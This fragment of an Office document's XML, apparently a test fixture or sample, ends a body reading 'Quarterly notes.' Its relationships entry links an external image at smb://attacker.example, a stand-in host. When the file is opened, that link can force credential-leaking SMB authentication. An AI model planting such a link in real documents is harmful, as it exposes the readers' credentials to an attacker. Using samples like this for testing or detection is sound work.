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Quarterly notes.</w:t>
      </w:r>
    </w:p>
  </w:body>
</w:document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smb://attacker.example/share/logo.png" TargetMode="External"/></Relationships>
</file>